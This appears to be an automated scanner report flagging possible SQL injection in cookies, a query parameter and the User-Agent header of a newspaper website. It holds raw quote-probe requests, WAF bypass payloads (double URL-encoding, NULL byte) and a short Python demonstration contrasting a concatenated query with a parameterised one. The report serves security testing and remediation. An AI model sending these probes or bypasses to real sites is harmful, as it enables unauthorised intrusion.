Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='SHARKS AT DETROITFaceoff: 4:30 p.m. at Joe Louis ArenaTV/radio: Versus, 98.5Red Wings updat ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /sharks''/ci_16785264?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/sharks''/ci_16785264 ...[SNIP]...
The UserType cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserType cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /sharks/ci_16794268?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser'; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Demers, Wallin injuries could have been worseDETROIT -- Jason Demers and Niclas Wallin had ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16794268?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser''; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Demers, Wallin injuries could have been worseDETROIT -- Jason Demers and Niclas Wallin had ...[SNIP]...
The source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the source request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /sharks/ci_16794268?source=rss%2527 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Demers, Wallin injuries could have been worseDETROIT -- Jason Demers and Niclas Wallin had ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16794268?source=rss%2527%2527 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Demers, Wallin injuries could have been worseDETROIT -- Jason Demers and Niclas Wallin had ...[SNIP]...
The u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /sharks/ci_16794268?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B%2527; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Demers, Wallin injuries could have been worseDETROIT -- Jason Demers and Niclas Wallin had ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16794268?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B%2527%2527; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Demers, Wallin injuries could have been worseDETROIT -- Jason Demers and Niclas Wallin had ...[SNIP]...
The fPage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fPage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that the response excerpts reproduced below do not show a database error: the single-quote request returns what appears to be the normal article page and the double-quote request a 302 redirect, so the full responses need to be compared before this heuristic result is reported as a confirmed injection point.
Request 1
GET /sharks/ci_16795056?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false'; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='A Sharks team that looked to be in way over its head for the first 10 minutes skated away w ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]... <p>But then everything changed. The Sharks started getting their sticks in the way of those crisp passes. That nightly attempt by Pavel Datsyuk to split the defense failed. Shooting lanes closed.</p> ...[SNIP]...
Request 2
GET /sharks/ci_16795056?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false''; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/sharks/ci_16795056?s ...[SNIP]...
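The single-quote / double-quote signature behind the finding above, and the parameterised fix recommended in the remediation background, reproduced as an added example that is not part of the scanner's report or of the site's code. It uses an in-memory SQLite table whose schema and cookie-to-column mapping are assumptions made for the demonstration; the cookie values are the ones from the requests above.

```python
import sqlite3

# Constructed in-memory table standing in for whatever the site keys on these cookies;
# the schema and the cookie-to-column mapping are assumptions made for this example.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE visitor (user_id TEXT, fpage TEXT, user_type TEXT)")
conn.execute("INSERT INTO visitor VALUES ('CG3BTKSGEWDI4CUUCBWCFFI', 'false', 'Browser')")
conn.commit()


def lookup_vulnerable(fpage: str) -> list:
    """Builds the query by concatenation, so the cookie value is parsed as SQL syntax."""
    sql = "SELECT user_id FROM visitor WHERE fpage = '" + fpage + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(fpage: str) -> list:
    """Parameterised query: the structure is fixed first, the value is bound afterwards."""
    sql = "SELECT user_id FROM visitor WHERE fpage = ?"
    return conn.execute(sql, (fpage,)).fetchall()


def raises_db_error(lookup, value: str) -> bool:
    """True if the lookup fails inside the database for this input."""
    try:
        lookup(value)
        return False
    except sqlite3.Error:
        return True


def quote_probe(lookup, base: str = "false") -> tuple:
    """Replays the scanner's heuristic: one quote should break the query and two quotes
    (an escaped quote inside the string literal) should repair it. (True, False) is the
    signature the report calls 'appears to be vulnerable'; (False, False) means the
    quote was handled as data."""
    return raises_db_error(lookup, base + "'"), raises_db_error(lookup, base + "''")
```

quote_probe(lookup_vulnerable) returns (True, False), the signature behind every "appears to be vulnerable" line in this report, while the same probe against lookup_safe returns (False, False). The probe is only a heuristic: anything that reacts to a stray quote (a JSON or cookie parser, a redirect from a front-end proxy) produces the same difference with no database involved, which is why each finding has to be confirmed against the full responses.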
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /tim-kawakami/ci_16739351?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT=' Something about this matchup turns the 49ers into alpha dogs and the Arizona Cardinals int ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]... <p>The Gore loss just gives them more to overcome. Now there is nothing for the 49ers to do but fight their way out, or at least fail valiantly. </p> ...[SNIP]...
Request 2
GET /tim-kawakami/ci_16739351?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/tim-kawakami/ci_1673 ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /tim-kawakami/ci_16755984?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI'; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Now 64 and 10 years removed from being San Francisco 49ers owner, DeBartolo sounds more tha ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]... <p>No coincidence that DeBartolo's first semifinalist berth comes a full decade after he was forced to sell the 49ers when he pleaded guilty for failing to report a felony amid a corruption case against then-Louisiana Gov. Edwin Edwards.</p> ...[SNIP]...
Request 2
GET /tim-kawakami/ci_16755984?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI''; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Now 64 and 10 years removed from being San Francisco 49ers owner, DeBartolo sounds more tha ...[SNIP]...
The Zvents cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Zvents cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where C string routines treat the first NULL byte as the end of the string: the filter inspects only the bytes before the %00, while the application runtime (the JSESSIONID cookie suggests a Java servlet container, which treats a NUL as an ordinary character) receives the whole value, including the quote that follows it. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /tim-kawakami/ci_16755984?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%00'; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Now 64 and 10 years removed from being San Francisco 49ers owner, DeBartolo sounds more tha ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]... <p>No coincidence that DeBartolo's first semifinalist berth comes a full decade after he was forced to sell the 49ers when he pleaded guilty for failing to report a felony amid a corruption case against then-Louisiana Gov. Edwin Edwards.</p> ...[SNIP]...
Request 2
GET /tim-kawakami/ci_16755984?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%00''; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Now 64 and 10 years removed from being San Francisco 49ers owner, DeBartolo sounds more tha ...[SNIP]...
The source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /tim-kawakami/ci_16755984?source=rss' HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Now 64 and 10 years removed from being San Francisco 49ers owner, DeBartolo sounds more tha ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
